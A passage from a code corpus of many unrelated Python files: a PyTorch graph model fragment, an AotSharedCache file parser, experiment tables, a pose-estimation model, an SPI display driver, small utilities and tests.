# STEP 1: propagate from question, documents, and facts to entities
# question -> entity
q2e_emb = q2e_linear(self.linear_drop(query_node_emb)).expand(batch_size, max_local_entity, self.trans_units)
next_local_entity_emb = torch.cat((next_local_entity_emb, q2e_emb), dim=2)
# fact -> entity
e2f_emb = self.relu(kb_self_linear(local_fact_emb) + self.sparse_bmm(entity2fact_mat, kb_head_linear(self.linear_drop(local_entity_emb))))
e2f_softmax_normalized = W_tilde.unsqueeze(dim=2) * self.sparse_bmm(entity2fact_mat, (pagerank_f / e2f_softmax).unsqueeze(dim=2))
e2f_emb = e2f_emb * e2f_softmax_normalized
f2e_emb = self.relu(kb_self_linear(local_entity_emb) + self.sparse_bmm(fact2entity_mat, kb_tail_linear(self.linear_drop(e2f_emb))))
pagerank_f = self.pagerank_lambda * self.sparse_bmm(fact2entity_mat, e2f_softmax_normalized).squeeze(dim=2) + (1 - self.pagerank_lambda) * pagerank_f
# STEP 2: combine embeddings from fact
next_local_entity_emb = torch.cat((next_local_entity_emb, self.fact_scale * f2e_emb), dim=2)
# STEP 3: propagate from entities to update question, documents, and facts
# entity -> query
query_node_emb = torch.bmm(pagerank_f.unsqueeze(dim=1), e2q_linear(self.linear_drop(next_local_entity_emb)))
# update entity
local_entity_emb = self.relu(e2e_linear(self.linear_drop(next_local_entity_emb)))
return local_entity_emb
def init_hidden(self, num_layer, batch_size, hidden_size):
return (use_cuda(Variable(torch.zeros(num_layer, batch_size, hidden_size))),
use_cuda(Variable(torch.zeros(num_layer, batch_size, hidden_size))))
def sparse_bmm(self, X, Y):
"""Batch multiply X and Y where X is sparse, Y is dense.
Args:
X: Sparse tensor of size BxMxN. Consists of two tensors,
I:3xZ indices, and V:1xZ values.
Y: Dense tensor of size BxNxK.
Returns:
batched-matmul(X, Y): BxMxK
"""
class LeftMMFixed(torch.autograd.Function):
"""
Implementation of matrix multiplication of a Sparse Variable with a Dense Variable, returning a Dense one.
This is added because there's no autograd for sparse yet. No gradient computed on the sparse weights.
"""
@staticmethod
def forward(ctx, sparse_weights, x):
ctx.sparse_weights = sparse_weights
return torch.mm(ctx.sparse_weights, x)
@staticmethod
def backward(ctx, grad_output):
sparse_weights = ctx.sparse_weights
return None, torch.mm(sparse_weights.t(), grad_output)
I = X._indices()
V = X._values()
B, M, N = X.size()
_, _, K = Y.size()
Z = I.size()[1]
lookup = Y[I[0, :], I[2, :], :]
X_I = torch.stack((I[0, :] * M + I[1, :], use_cuda(torch.arange(Z).type(torch.LongTensor))), 0)
S = use_cuda(Variable(torch.sparse.FloatTensor(X_I, V, torch.Size([B * M, Z])), requires_grad=False))
prod = LeftMMFixed.apply(S, lookup)
return prod.view(B, M, K)
|
AotSharedCacheExtractor/main.py | FFRI/ProjectChampollion | 172 | 12728450 | #
# (c) FFRI Security, Inc., 2021 / Author: FFRI Security, Inc.
#
import mmap
import os
from ctypes import Structure, c_uint32, c_uint64, sizeof
from typing import Iterable, Optional, cast
import typer
app = typer.Typer()
AOT_SHARED_CACHE_MAGIC = 0x6568636143746F41
def show_err(msg: str) -> None:
typer.secho(msg, err=True, fg=typer.colors.RED)
def show_warn(msg: str) -> None:
typer.secho(msg, err=True, fg=typer.colors.YELLOW)
def show_log(msg: str) -> None:
typer.secho(msg, err=True, fg=typer.colors.GREEN)
class AotMappingInfo(Structure):
"""
struct AotMappingInfo {
uint64_t address;
uint64_t size;
uint64_t file_offset;
uint32_t init_prot;
uint32_t max_prot;
};
"""
_fields_ = (
("address", c_uint64),
("size", c_uint64),
("file_offset", c_uint64),
("init_prot", c_uint32),
("max_prot", c_uint32),
)
def __str__(self) -> str:
return f"""\tAotMappingInfo:
\t\taddress: {hex(self.address)}
\t\tsize: {hex(self.size)}
\t\tfile_offset: {hex(self.file_offset)}
\t\tinit_prot: {hex(self.init_prot)}
\t\tmax_prot: {hex(self.max_prot)}
"""
class AotSharedCacheHeader(Structure):
"""
struct AotSharedCacheHeader {
uint64_t magic;
uint64_t field_0x8;
uint64_t field_0x10;
uint64_t uuid[2];
uint64_t version[4];
uint64_t offset_to_codesig;
uint64_t size_of_codesig;
uint32_t n_entries;
uint32_t offset_to_metadata_seg;
struct AotMappingInfo mapping[3];
};
"""
_fields_ = (
("magic", c_uint64),
("field_0x8", c_uint64),
("field_0x10", c_uint64),
("uuid", c_uint64 * 2),
("version", c_uint64 * 4),
("offset_to_codesig", c_uint64),
("size_of_codesig", c_uint64),
("n_entries", c_uint32),
("offset_to_metadata_seg", c_uint32),
("mapping", AotMappingInfo * 3),
)
def __str__(self) -> str:
return f"""AotSharedCacheHeader:
\tmagic: {hex(self.magic)}
\tfield_0x8: {hex(self.field_0x8)}
\tfield_0x10: {hex(self.field_0x10)}
\tuuid: {[hex(self.uuid[i]) for i in range(2)]}
\tversion: {[hex(self.version[i]) for i in range(4)]}
\toffset_to_codesig: {hex(self.offset_to_codesig)}
\tsize_of_codesig: {hex(self.size_of_codesig)}
\tn_entries: {hex(self.n_entries)}
\toffset_to_metadata_seg: {hex(self.offset_to_metadata_seg)}
\tmapping:\n {''.join(str(self.mapping[i]) for i in range(3))}"""
class CodeFragmentMetaData(Structure):
_fields_ = (
("type", c_uint32),
("offset_to_path_name", c_uint32),
("offset_to_x64_code", c_uint32),
("size_of_x64_code", c_uint32),
("offset_to_arm64_code", c_uint32),
("size_of_arm64_code", c_uint32),
("offset_to_branch_data", c_uint32),
("size_of_branch_data", c_uint32),
("offset_to_insn_map", c_uint32),
("size_of_insn_map", c_uint32),
)
def __str__(self) -> str:
return f"""CodeFragmentMetaData:
\ttype: {hex(self.type)}
\toffset_to_path_name: {hex(self.offset_to_path_name)}
\toffset_to_x64_code: {hex(self.offset_to_x64_code)}
\tsize_of_x64_code: {hex(self.size_of_x64_code)}
\toffset_to_arm64_code: {hex(self.offset_to_arm64_code)}
\tsize_of_arm64_code: {hex(self.size_of_arm64_code)}
\toffset_to_branch_data: {hex(self.offset_to_branch_data)}
\tsize_of_branch_data: {hex(self.size_of_branch_data)}
\toffset_to_insn_map: {hex(self.offset_to_insn_map)}
\tsize_of_insn_map: {hex(self.size_of_insn_map)}"""
def load_aot_mapped_module_names(mapped_module_file: str) -> Optional[Iterable[str]]:
if not os.path.exists(mapped_module_file):
show_err(f"{mapped_module_file} does not exist")
return None
with open(mapped_module_file, "r") as fin:
for line in fin.readlines():
yield line.strip()
@app.command()
def extract_codesig(aot_shared_cache_path: str, output_file_path: str) -> None:
if not os.path.exists(aot_shared_cache_path):
show_err(f"{aot_shared_cache_path} does not exist")
return
with open(aot_shared_cache_path, "r+b") as fin:
mm = mmap.mmap(fin.fileno(), 0)
header = AotSharedCacheHeader.from_buffer_copy(
cast(bytes, mm[0:sizeof(AotSharedCacheHeader)]), 0
)
if header.magic != AOT_SHARED_CACHE_MAGIC:
show_err("magic should be AotCache")
return
codesig_beg = header.offset_to_codesig
codesig_end = codesig_beg + header.size_of_codesig
show_log(f"Will extract a code signature located at [{hex(codesig_beg)}, {hex(codesig_end)}]")
with open(output_file_path, "wb") as fout:
fout.write(cast(bytes, mm[codesig_beg:codesig_end]))
show_log(f"The extracted code signature is saved to {output_file_path}")
@app.command()
def dump(aot_shared_cache_path: str) -> None:
if not os.path.exists(aot_shared_cache_path):
show_err(f"{aot_shared_cache_path} does not exist")
return
if (
mapped_module_names := load_aot_mapped_module_names("aot_mapped_module_names")
) is None:
return
with open(aot_shared_cache_path, "r+b") as fin:
mm = mmap.mmap(fin.fileno(), 0)
header = AotSharedCacheHeader.from_buffer_copy(
cast(bytes, mm[0:sizeof(AotSharedCacheHeader)]), 0
)
if header.magic != AOT_SHARED_CACHE_MAGIC:
show_err("magic should be AotCache")
return
typer.echo(header)
aot_seg_beg = header.mapping[2].file_offset
metadata_seg_beg = header.offset_to_metadata_seg
typer.echo(f"metadata segment starts from {hex(metadata_seg_beg)}")
cur_seek = header.offset_to_metadata_seg
typer.echo(f"number of entries is {header.n_entries}")
for _ in range(header.n_entries):
entry = CodeFragmentMetaData.from_buffer_copy(
cast(bytes, mm[cur_seek : cur_seek + sizeof(CodeFragmentMetaData)])
)
typer.echo(entry)
cur_seek += sizeof(CodeFragmentMetaData)
if entry.type == 0:
if cur_seek != metadata_seg_beg + entry.offset_to_branch_data:
show_err("branch data does not follow")
show_err(
f"{hex(cur_seek)} {hex(metadata_seg_beg)} {hex(entry.offset_to_branch_data)}"
)
return
branch_data_beg, branch_data_end = cur_seek, cur_seek + entry.size_of_branch_data
cur_seek += entry.size_of_branch_data
if cur_seek != metadata_seg_beg + entry.offset_to_insn_map:
show_err("instruction map data does not follow")
show_err(
f"{hex(cur_seek)} {hex(metadata_seg_beg)} {hex(entry.offset_to_insn_map)}"
)
return
insn_map_beg, insn_map_end = cur_seek, cur_seek + entry.size_of_insn_map
cur_seek += entry.size_of_insn_map
arm64_code_beg = aot_seg_beg + entry.offset_to_arm64_code
cache_code_end = arm64_code_beg + entry.size_of_arm64_code
typer.echo(
f"[{hex(arm64_code_beg)}, {hex(cache_code_end)}] {next(mapped_module_names)}"
)
typer.echo(
f"\tbranch data: [{hex(branch_data_beg)}, {hex(branch_data_end)}]"
)
typer.echo(
f"\tinstruction map: [{hex(insn_map_beg)}, {hex(insn_map_end)}]"
)
elif entry.type == 1:
runtime_begin = aot_seg_beg + entry.offset_to_arm64_code
runtime_end = runtime_begin + entry.size_of_arm64_code
typer.echo(
f"[{hex(runtime_begin)}, {hex(runtime_end)}] RuntimeRoutines"
)
else:
show_err(f"Unknown CodeSegmentMetadata entry ({hex(entry.type)})")
return
if __name__ == "__main__":
app()
|
sfaira/versions/genomes/__init__.py | theislab/sfaira | 110 | 12728471 | from .genomes import GenomeContainer, GtfInterface
from .utils import translate_id_to_symbols, translate_symbols_to_id
|
moe/__init__.py | misokg/Cornell-MOE | 218 | 12728560 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
#: Following the versioning system at http://semver.org/
#: See also docs/contributing.rst, section ``Versioning``
#: MAJOR: incremented for incompatible API changes
MAJOR = 1
#: MINOR: incremented for adding functionality in a backwards-compatible manner
MINOR = 0
#: PATCH: incremented for backward-compatible bug fixes and minor capability improvements
PATCH = 0
#: Latest release version of MOE
__version__ = "{0:d}.{1:d}.{2:d}".format(MAJOR, MINOR, PATCH)
|
mle_monitor/protocol/tables.py | mle-infrastructure/mle-monitor | 107 | 12728581 | <filename>mle_monitor/protocol/tables.py<gh_stars>100-1000
import pandas as pd
from datetime import datetime
from rich import box
from rich.table import Table
from rich.spinner import Spinner
from rich.console import Console
from rich.align import Align
from rich.progress import (
BarColumn,
Progress,
TextColumn,
)
def protocol_summary(
db, all_experiment_ids, tail: int = 5, verbose: bool = True, full: bool = False
):
"""Construct a summary dataframe of previous experiments."""
# Set pandas df format option to print
pd.set_option("display.max_columns", 5)
pd.set_option("max_colwidth", 30)
if len(all_experiment_ids) > 0:
purposes, project_names, exp_paths = [], [], []
num_seeds, statuses, start_times, experiment_types = [], [], [], []
resource, num_cpus, num_gpus, total_jobs, completed_jobs = [], [], [], [], []
if tail is None:
tail = len(all_experiment_ids)
# Loop over experiment ids and extract data to retrieve
for int_e_id in all_experiment_ids[-tail:]:
e_id = str(int_e_id)
purposes.append(db.dget(e_id, "purpose"))
project_names.append(db.dget(e_id, "project_name"))
exp_paths.append(db.dget(e_id, "experiment_dir"))
statuses.append(db.dget(e_id, "job_status"))
start_times.append(db.dget(e_id, "start_time"))
resource.append(db.dget(e_id, "exec_resource"))
num_seeds.append(db.dget(e_id, "num_seeds"))
num_cpus.append(db.dget(e_id, "num_cpus"))
num_gpus.append(db.dget(e_id, "num_gpus"))
experiment_types.append(db.dget(e_id, "experiment_type"))
total_jobs.append(db.dget(e_id, "num_total_jobs"))
completed_jobs.append(db.dget(e_id, "completed_jobs"))
d = {
"ID": [str(e_id) for e_id in all_experiment_ids[-tail:]],
"Date": start_times,
"Project": project_names,
"Purpose": purposes,
"Experiment Dir": exp_paths,
"Status": statuses,
"Seeds": num_seeds,
"Resource": resource,
"CPUs": num_cpus,
"GPUs": num_gpus,
"Type": experiment_types,
"Jobs": total_jobs,
"Completed Jobs": completed_jobs,
}
df = pd.DataFrame(d)
df["Date"] = df["Date"].map("{:.5}".format)
df["Purpose"] = df["Purpose"].map("{:.30}".format)
# Print a nice table overview (no job resources)
if verbose:
Console().print(Align.left(protocol_table(df, full)))
return df
else:
if verbose:
time_t = datetime.now().strftime("%m/%d/%Y %I:%M:%S %p")
print(time_t, "No previously recorded experiments")
return None
def get_progress_bar(total_jobs: int, completed_jobs: int):
progress = Progress(
TextColumn(
"{task.completed:^3.0f}/{task.total:^3.0f}", justify="left", style="white"
),
BarColumn(bar_width=10, style="red"),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%", style="white"),
auto_refresh=False,
)
task = progress.add_task("queue", total=total_jobs)
progress.update(task, completed=completed_jobs, refresh=True)
return progress
def protocol_table(df, full: bool = True):
"""Generate pretty table of experiment protocol db - preselected db."""
table = Table(show_header=True, show_footer=False, header_style="bold blue")
table.add_column(":bookmark:", justify="center")
table.add_column(":id:", justify="center")
table.add_column(":spiral_calendar:", justify="center")
table.add_column("Project")
table.add_column("Purpose")
table.add_column("Type")
table.add_column("[yellow]:arrow_forward:", justify="center")
table.add_column("[yellow]:recycle:", justify="center")
table.add_column("CPU", justify="center")
table.add_column("GPU", justify="center")
# Full option prints also resource requirements of jobs
if full:
table.add_column(
":hourglass_flowing_sand: Completed Jobs [yellow]:heavy_check_mark:",
justify="center",
)
# Add rows of info if dataframe exists (previously recorded experiments)
if df is not None:
for index in reversed(df.index):
row = df.iloc[index]
if row["Resource"] == "sge-cluster":
resource = "SGE"
elif row["Resource"] == "slurm-cluster":
resource = "Slurm"
elif row["Resource"] == "gcp-cloud":
resource = "GCP"
else:
resource = "Local"
if row["Type"] == "hyperparameter-search":
exp_type = "search"
elif row["Type"] == "multiple-configs":
exp_type = "config"
elif row["Type"] == "single-config":
exp_type = "single"
else:
exp_type = row["Type"]
if row["Status"] == "running":
status = Spinner("dots", style="magenta")
elif row["Status"] == "completed":
status = "[green]:heavy_check_mark:"
else:
status = "[red]:heavy_multiplication_x:"
if full:
bar = get_progress_bar(int(row["Jobs"]), int(row["Completed Jobs"]))
table.add_row(
status,
row["ID"],
row["Date"],
row["Project"][:10],
row["Purpose"][:15],
exp_type,
resource,
str(row["Seeds"]),
str(row["CPUs"]),
str(row["GPUs"]),
bar,
)
else:
table.add_row(
status,
row["ID"],
row["Date"],
row["Project"][:10],
row["Purpose"][:25],
exp_type,
resource,
str(row["Seeds"]),
str(row["CPUs"]),
str(row["GPUs"]),
)
table.border_style = "blue"
table.box = box.SIMPLE_HEAD
return table
|
src/agent/kubernetes-agent/src/network/__init__.py | hyperledger-gerrit-archive/cello | 865 | 12728602 | <filename>src/agent/kubernetes-agent/src/network/__init__.py
#
# SPDX-License-Identifier: Apache-2.0
#
from .fabric import FabricNetwork
|
src/livestreamer/packages/flashmedia/error.py | jaccarmac/livestreamer | 3,614 | 12728648 | <reponame>jaccarmac/livestreamer<filename>src/livestreamer/packages/flashmedia/error.py<gh_stars>1000+
#!/usr/bin/env python
class FLVError(Exception):
pass
class F4VError(Exception):
pass
class AMFError(Exception):
pass
__all__ = ["FLVError", "F4VError", "AMFError"]
|
src/model/paf_model.py | ParikhKadam/part-affinity | 110 | 12728668 | import torch.nn as nn
from .helper import init, make_standard_block
import torch
class PAFModel(nn.Module):
def __init__(self, backend, backend_outp_feats, n_joints, n_paf, n_stages=7):
super(PAFModel, self).__init__()
assert (n_stages > 0)
self.backend = backend
stages = [Stage(backend_outp_feats, n_joints, n_paf, True)]
for i in range(n_stages - 1):
stages.append(Stage(backend_outp_feats, n_joints, n_paf, False))
self.stages = nn.ModuleList(stages)
def forward(self, x):
img_feats = self.backend(x)
cur_feats = img_feats
heatmap_outs = []
paf_outs = []
for i, stage in enumerate(self.stages):
heatmap_out, paf_out = stage(cur_feats)
heatmap_outs.append(heatmap_out)
paf_outs.append(paf_out)
cur_feats = torch.cat([img_feats, heatmap_out, paf_out], 1)
return heatmap_outs, paf_outs
class Stage(nn.Module):
def __init__(self, backend_outp_feats, n_joints, n_paf, stage1):
super(Stage, self).__init__()
inp_feats = backend_outp_feats
if stage1:
self.block1 = make_paf_block_stage1(inp_feats, n_joints)
self.block2 = make_paf_block_stage1(inp_feats, n_paf)
else:
inp_feats = backend_outp_feats + n_joints + n_paf
self.block1 = make_paf_block_stage2(inp_feats, n_joints)
self.block2 = make_paf_block_stage2(inp_feats, n_paf)
init(self.block1)
init(self.block2)
def forward(self, x):
y1 = self.block1(x)
y2 = self.block2(x)
return y1, y2
def make_paf_block_stage1(inp_feats, output_feats):
layers = [make_standard_block(inp_feats, 128, 3),
make_standard_block(128, 128, 3),
make_standard_block(128, 128, 3),
make_standard_block(128, 512, 1, 1, 0)]
layers += [nn.Conv2d(512, output_feats, 1, 1, 0)]
return nn.Sequential(*layers)
def make_paf_block_stage2(inp_feats, output_feats):
layers = [make_standard_block(inp_feats, 128, 7, 1, 3),
make_standard_block(128, 128, 7, 1, 3),
make_standard_block(128, 128, 7, 1, 3),
make_standard_block(128, 128, 7, 1, 3),
make_standard_block(128, 128, 7, 1, 3),
make_standard_block(128, 128, 1, 1, 0)]
layers += [nn.Conv2d(128, output_feats, 1, 1, 0)]
return nn.Sequential(*layers)
|
atcoder/abc099/b.py | Ashindustry007/competitive-programming | 506 | 12728674 | <gh_stars>100-1000
#!/usr/bin/env python3
# https://abc099.contest.atcoder.jp/tasks/abc099_b
a, b = map(int, input().split())
d = b - a
k = d * (d - 1) // 2
print(k - a)
|
convert.py | onlyrico/RepMLP | 220 | 12728709 | import argparse
import os
import torch
from repmlpnet import *
parser = argparse.ArgumentParser(description='RepMLPNet Conversion')
parser.add_argument('load', metavar='LOAD', help='path to the source weights file')
parser.add_argument('save', metavar='SAVE', help='path to the target weights file')
parser.add_argument('-a', '--arch', metavar='ARCH', default='RepMLPNet-B224')
def convert():
args = parser.parse_args()
if args.arch == 'RepMLPNet-B224':
model = create_RepMLPNet_B224(deploy=False)
elif args.arch == 'RepMLPNet-B256':
model = create_RepMLPNet_B256(deploy=False)
else:
raise ValueError('TODO')
if os.path.isfile(args.load):
print("=> loading checkpoint '{}'".format(args.load))
checkpoint = torch.load(args.load, map_location='cpu')
if 'state_dict' in checkpoint:
checkpoint = checkpoint['state_dict']
elif 'model' in checkpoint:
checkpoint = checkpoint['model']
ckpt = {k.replace('module.', ''): v for k, v in checkpoint.items()} # strip the names
print(ckpt.keys())
model.load_state_dict(ckpt)
else:
print("=> no checkpoint found at '{}'".format(args.load))
model.locality_injection()
torch.save(model.state_dict(), args.save)
if __name__ == '__main__':
convert() |
env/Lib/site-packages/OpenGL/GLES2/ANGLE/pack_reverse_row_order.py | 5gconnectedbike/Navio2 | 210 | 12728716 | '''OpenGL extension ANGLE.pack_reverse_row_order
This module customises the behaviour of the
OpenGL.raw.GLES2.ANGLE.pack_reverse_row_order to provide a more
Python-friendly API
Overview (from the spec)
This extension introduces a mechanism to allow reversing the order
in which image rows are written into a pack destination. This
effectively allows an application to flip the results of a ReadPixels
in the y direction operation without having to render upside down.
The coordinate system of OpenGL is vertically reversed in comparison to a
number of other graphics systems such as native windowing APIs. Applications
that perform ReadPixels may have to either render to an intermediate color
buffer before calling ReadPixels or perform a flip in software after
ReadPixels. In some systems the GL can perform the row reversal during
ReadPixels without incurring additional cost.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ANGLE/pack_reverse_row_order.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.ANGLE.pack_reverse_row_order import *
from OpenGL.raw.GLES2.ANGLE.pack_reverse_row_order import _EXTENSION_NAME
def glInitPackReverseRowOrderANGLE():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
vedastr/models/bodies/rectificators/registry.py | csmasters/vedastr | 475 | 12728758 | from vedastr.utils import Registry
RECTIFICATORS = Registry('Rectificator')
|
python/samples/st7735s.py | robn/spidriver | 142 | 12728793 | <reponame>robn/spidriver<gh_stars>100-1000
#!/usr/bin/env python3
# coding=utf-8
import array
import getopt
import struct
import sys
import time
from PIL import Image
from spidriver import SPIDriver
# Pure Python rgb to 565 encoder for portablity
def as565(im):
rr, gg, bb = [list(c.getdata()) for c in im.convert("RGB").split()]
def s(x, n):
return x * (2 ** n - 1) // 255
d565 = [(s(b, 5) << 11) | (s(g, 6) << 5) | s(r, 5) for (r,g,b) in zip(rr, gg, bb)]
d565h = array.array('H', d565)
d565h.byteswap()
return array.array('B', d565h.tostring())
NOP = 0x00
SWRESET = 0x01
RDDID = 0x04
RDDST = 0x09
SLPIN = 0x10
SLPOUT = 0x11
PTLON = 0x12
NORON = 0x13
INVOFF = 0x20
INVON = 0x21
DISPOFF = 0x28
DISPON = 0x29
CASET = 0x2A
RASET = 0x2B
RAMWR = 0x2C
RAMRD = 0x2E
PTLAR = 0x30
COLMOD = 0x3A
MADCTL = 0x36
FRMCTR1 = 0xB1
FRMCTR2 = 0xB2
FRMCTR3 = 0xB3
INVCTR = 0xB4
DISSET5 = 0xB6
PWCTR1 = 0xC0
PWCTR2 = 0xC1
PWCTR3 = 0xC2
PWCTR4 = 0xC3
PWCTR5 = 0xC4
VMCTR1 = 0xC5
RDID1 = 0xDA
RDID2 = 0xDB
RDID3 = 0xDC
RDID4 = 0xDD
PWCTR6 = 0xFC
GMCTRP1 = 0xE0
GMCTRN1 = 0xE1
DELAY = 0x80
class ST7735:
def __init__(self, sd):
self.sd = sd
self.sd.unsel()
def write(self, a, c):
self.sd.seta(a)
self.sd.sel()
self.sd.write(c)
self.sd.unsel()
def writeCommand(self, cc):
self.write(0, struct.pack("B", cc))
def writeData(self, c):
self.write(1, c)
def writeData1(self, cc):
self.writeData(struct.pack("B", cc))
def cmd(self, cc, args=()):
self.writeCommand(cc)
n = len(args)
if n != 0:
self.writeData(struct.pack(str(n) + "B", *args))
def setAddrWindow(self, x0, y0, x1, y1):
self.writeCommand(CASET) # Column addr set
self.writeData(struct.pack(">HH", x0, x1))
self.writeCommand(RASET) # Row addr set
self.writeData(struct.pack(">HH", y0, y1))
self.writeCommand(RAMWR) # write to RAM
def rect(self, x, y, w, h, color):
self.setAddrWindow(x, y, x + w - 1, y + h - 1)
self.writeData(w * h * struct.pack(">H", color))
def start(self):
self.sd.setb(0)
time.sleep(.001)
self.sd.setb(1)
time.sleep(.001)
self.cmd(SWRESET) # Software reset, 0 args, w/delay
time.sleep(.180)
self.cmd(SLPOUT) # Out of sleep mode, 0 args, w/delay
time.sleep(.180)
commands = [
(FRMCTR1, ( # Frame rate ctrl - normal mode
0x01, 0x2C, 0x2D)), # Rate = fosc/(1x2+40) * (LINE+2C+2D)
(FRMCTR2, ( # Frame rate control - idle mode
0x01, 0x2C, 0x2D)), # Rate = fosc/(1x2+40) * (LINE+2C+2D)
(FRMCTR3, ( # Frame rate ctrl - partial mode
0x01, 0x2C, 0x2D, # Dot inversion mode
0x01, 0x2C, 0x2D)), # Line inversion mode
(PWCTR1, ( # Power control
0xA2,
0x02, # -4.6V
0x84)), # AUTO mode
(PWCTR2, ( # Power control
0xC5,)), # VGH25 = 2.4C VGSEL = -10 VGH = 3 * AVDD
(PWCTR3, ( # Power control
0x0A, # Opamp current small
0x00)), # Boost frequency
(PWCTR4, ( # Power control
0x8A, # BCLK/2, Opamp current small & Medium low
0x2A)),
(PWCTR5, ( # Power control
0x8A, 0xEE)),
(VMCTR1, ( # VCOM control
0x0E,)),
(MADCTL, ( # Memory access control (directions)
0xC8,)), # row addr/col addr, bottom to top refresh
(COLMOD, ( # set color mode
0x05,)), # 16-bit color
(GMCTRP1, ( # Gamma + polarity Correction Characterstics
0x02, 0x1c, 0x07, 0x12,
0x37, 0x32, 0x29, 0x2d,
0x29, 0x25, 0x2B, 0x39,
0x00, 0x01, 0x03, 0x10)),
(GMCTRN1, ( # Gamma - polarity Correction Characterstics
0x03, 0x1d, 0x07, 0x06,
0x2E, 0x2C, 0x29, 0x2D,
0x2E, 0x2E, 0x37, 0x3F,
0x00, 0x00, 0x02, 0x10)),
(NORON, ()), # Normal display on
(DISPON, ()), # Main screen turn on
]
for c, args in commands:
self.cmd(c, args)
def clear(self):
self.rect(0, 0, 128, 160, 0x0000)
def loadimage(self, a):
im = Image.open(a)
if im.size[0] > im.size[1]:
im = im.transpose(Image.ROTATE_90)
w = 160 * im.size[0] // im.size[1]
im = im.resize((w, 160), Image.ANTIALIAS)
(w, h) = im.size
if w > 128:
im = im.crop((w // 2 - 64, 0, w // 2 + 64, 160))
elif w < 128:
c = Image.new("RGB", (128, 160))
c.paste(im, (64 - w // 2, 0))
im = c
st.setAddrWindow(0, 0, 127, 159)
st.writeData(as565(im.convert("RGB")))
if __name__ == '__main__':
try:
optlist, args = getopt.getopt(sys.argv[1:], "h:")
except getopt.GetoptError as reason:
print()
print('usage: st7735 [ -h device ] image...')
print()
print()
sys.exit(1)
optdict = dict(optlist)
st = ST7735(SPIDriver(optdict.get('-h', "/dev/ttyUSB0")))
st.start()
st.clear()
for a in args:
st.loadimage(a)
|
napari/_tests/test_multiple_viewers.py | MaksHess/napari | 1,345 | 12728827 | from napari import Viewer
def test_multi_viewers_dont_clash(qapp):
v1 = Viewer(show=False, title='v1')
v2 = Viewer(show=False, title='v2')
assert not v1.grid.enabled
assert not v2.grid.enabled
v1.window.activate() # a click would do this in the actual gui
v1.window._qt_viewer.viewerButtons.gridViewButton.click()
assert not v2.grid.enabled
assert v1.grid.enabled
v1.close()
v2.close()
|
src/lockmgr.py | anbo225/docklet | 273 | 12728833 | #!/usr/bin/python3
'''
This module is the manager of threadings locks.
A LockMgr manages multiple threadings locks.
'''
import threading
class LockMgr:
def __init__(self):
# self.locks will store multiple locks by their names.
self.locks = {}
# the lock of self.locks, is to ensure that only one thread can update it at the same time
self.locks_lock = threading.Lock()
# acquire a lock by its name
def acquire(self, lock_name):
self.locks_lock.acquire()
if lock_name not in self.locks.keys():
self.locks[lock_name] = threading.Lock()
self.locks_lock.release()
self.locks[lock_name].acquire()
return
# release a lock by its name
def release(self, lock_name):
if lock_name not in self.locks.keys():
return
self.locks[lock_name].release()
return
|
aliyun-python-sdk-cloudphoto/aliyunsdkcloudphoto/__init__.py | yndu13/aliyun-openapi-python-sdk | 1,001 | 12728850 | <filename>aliyun-python-sdk-cloudphoto/aliyunsdkcloudphoto/__init__.py
__version__ = "1.1.19" |
python/src/converters/__init__.py | vvucetic/keyvi | 199 | 12728857 | <reponame>vvucetic/keyvi
from .pykeyvi_autowrap_conversion_providers import *
from autowrap.ConversionProvider import special_converters
def register_converters():
special_converters.append(MatchIteratorPairConverter())
|
openmmtools/data/benzene-toluene-implicit/generate-molecules.py | sroet/openmmtools | 135 | 12728859 | #!/usr/bin/env python
"""
Generate molecules for test system using OpenEye tools.
"""
molecules = { 'BEN' : 'benzene',
'TOL' : 'toluene' }
from openeye import oechem
from openeye import oeomega
from openeye import oeiupac
from openeye import oequacpac
# Create molecules.
for resname in molecules:
name = molecules[resname]
print(name)
# Create molecule from IUPAC name.
molecule = oechem.OEMol()
oeiupac.OEParseIUPACName(molecule, name)
molecule.SetTitle(name)
# Normalize molecule.
oechem.OEAddExplicitHydrogens(molecule)
oechem.OETriposAtomNames(molecule)
oechem.OEAssignAromaticFlags(molecule, oechem.OEAroModelOpenEye)
# Create configuration.
omega = oeomega.OEOmega()
omega.SetStrictStereo(True)
omega.SetIncludeInput(False)
omega(molecule)
# Create charges.
oequacpac.OEAssignPartialCharges(molecule, oequacpac.OECharges_AM1BCCSym)
# Write molecule.
filename = '%s.tripos.mol2' % name
print(filename)
ofs = oechem.oemolostream()
ofs.open(filename)
oechem.OEWriteMolecule(ofs, molecule)
ofs.close()
# Replace <0> with resname.
infile = open(filename, 'r')
lines = infile.readlines()
infile.close()
newlines = [line.replace('<0>', resname) for line in lines]
outfile = open(filename, 'w')
outfile.writelines(newlines)
outfile.close()
|
src/research/dynamic/dynamic_test.py | mzy2240/GridCal | 284 | 12728889 | from GridCal.Engine.calculation_engine import *
from GridCal.Engine.Simulations.Dynamics.dynamic_modules import *
grid = MultiCircuit()
# grid.load_file('lynn5buspv.xlsx')
grid.load_file('IEEE30.xlsx')
grid.compile()
circuit = grid.circuits[0]
options = PowerFlowOptions(SolverType.NR, verbose=False, robust=False, tolerance=1e-9)
power_flow = PowerFlow(grid, options)
power_flow.run()
dynamic_devices = circuit.get_generators()
bus_indices = [circuit.buses_dict[elm.bus] for elm in dynamic_devices]
res = dynamic_simulation(n=len(circuit.buses),
Vbus=power_flow.results.voltage,
Sbus=circuit.power_flow_input.Sbus,
Ybus=circuit.power_flow_input.Ybus,
Sbase=circuit.Sbase,
fBase=50,
t_sim=50,
h=0.001,
dynamic_devices=dynamic_devices,
bus_indices=bus_indices)
from matplotlib import pyplot as plt
plt.figure()
plt.plot(res.time, abs(res.voltage), linewidth=1)
plt.title('Generator voltages')
plt.figure()
plt.plot(res.time, abs(res.omegas), linewidth=1)
plt.title('Angular speeds')
plt.show()
|
src/titiler/core/titiler/core/resources/responses.py | obaid585/rastertile | 288 | 12728924 | <gh_stars>100-1000
"""Common response models."""
from typing import Any
import simplejson as json
from starlette import responses
class XMLResponse(responses.Response):
"""XML Response"""
media_type = "application/xml"
class JSONResponse(responses.JSONResponse):
"""Custom JSON Response."""
def render(self, content: Any) -> bytes:
"""Render JSON.
Same defaults as starlette.responses.JSONResponse.render but allow NaN to be replaced by null using simplejson
"""
return json.dumps(
content,
